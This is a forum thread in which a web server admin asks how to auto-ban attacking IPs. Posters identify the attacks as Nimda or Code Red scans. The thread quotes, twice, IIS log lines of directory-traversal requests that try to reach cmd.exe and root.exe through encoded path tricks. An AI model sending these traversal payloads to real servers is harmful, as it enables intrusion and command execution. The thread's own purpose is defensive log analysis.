Something fruity...

Alright, this is a kind of rare question, and I was wondering if anyone had some input.

Basically, I've been getting some malicious attacks on my IIS Web Server lately, and they can't punch through which is great, but as a precausion I'm manually banning each IP address that makes these attempts. Now, since IP spoofing isn't the hardest thing in the world, this isn't a real effective solution, and it's also time consuming.

I was just curious if Apache (Or any web server) had the ability to automatically ban an IP which attempts malicious attacks on the web server. Perhaps by passing each HTTP-GET string through a regular expression which defines a given "malicious attack". For instance, it could look for "cmd.exe" in the HTTP-GET string, and automatically ban the IP that tried it.

Right now I'm using IIS, but I'd entertain a different web server if I could get some sort of auto-banning happening here. I personally think that would rock.

It could be done with an Apache Module, but I do not know of any that automatically handle it.

Are you sure it isn't a new virus/worm/buzzword for malicious program of the week?

Well, that is odd -- I haven't even seen a Nimda in my logs for a couple days now... odd.

------------------
Founder of the Sharky (Ultra) High-Resolution Club[SHRC] [SHRC:ETCH]
[SGC Ultimate pass... Don't read anything I post unless you want a headache]
SF Linux Hippie Club Vice-Vice President [Card]
America Online Doit Mourir
Everything you ever wanted to know and see about e-dawg...

I don't think so...though there was one unrelated Code Red 2 attack in there. But the stuff I'm concerned about is this:

Code:

---

80 GET /scripts/root.exe /c+dir 404 - -
80 GET /MSADC/root.exe /c+dir 404 - -
80 GET /c/winnt/system32/cmd.exe /c+dir 404 - -
80 GET /d/winnt/system32/cmd.exe /c+dir 404 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 - -
80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 - -
80 GET /winnt/system32/cmd.exe /c+dir 404 - -
80 GET /winnt/system32/cmd.exe /c+dir 404 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 - -

---

To me, this looks more like some plain ol' script kiddy crap that tries a bunch of common directory traversal exploits on IIS. There were 3 different IP's which tried this, 2 of which were in the same *.*.* IP group. I'm not sure if it's someone who just feels like pounding on my server until they get in.....or perhaps it is just some auto-hack worm that's trying to spread itself over the net again.

Quote:

---

Originally posted by Grizzly:
I don't think so...though there was one unrelated Code Red 2 attack in there. But the stuff I'm concerned about is this:

Code:

---

80 GET /scripts/root.exe /c+dir 404 - -
80 GET /MSADC/root.exe /c+dir 404 - -
80 GET /c/winnt/system32/cmd.exe /c+dir 404 - -
80 GET /d/winnt/system32/cmd.exe /c+dir 404 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 - -
80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 - -
80 GET /winnt/system32/cmd.exe /c+dir 404 - -
80 GET /winnt/system32/cmd.exe /c+dir 404 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 - -

---

To me, this looks more like some plain ol' script kiddy crap that tries a bunch of common directory traversal exploits on IIS. There were 3 different IP's which tried this, 2 of which were in the same *.*.* IP group. I'm not sure if it's someone who just feels like pounding on my server until they get in.....or perhaps it is just some auto-hack worm that's trying to spread itself over the net again.

---

I'd say it looks like Nimda, but, it doesn't have quite the right fingerprint.

A portion of the log (toward the end) looks like it is some automated script kiddie program searching for compromised machines with Code Red, Code Red 2, Nimda, or variants on it.

Yeah it turns out I'm not alone in this one. A good friend of mine has the exact same stuff in his IIS logs, and he lives a couple states over. So I'm guessing this is some sort of simple script kiddy crap going around. No bother...at least I know it's not some personal vendetta against my server, haha https://www.sharkyforums.com/images/.../2005/06/4.gif

The top portion of that excerpt is Nimda. The bottom portion doesn't look like any of the ones I am familiar with, but, I run Apache, so I just collect those failures up in my logs and give people statistics like these...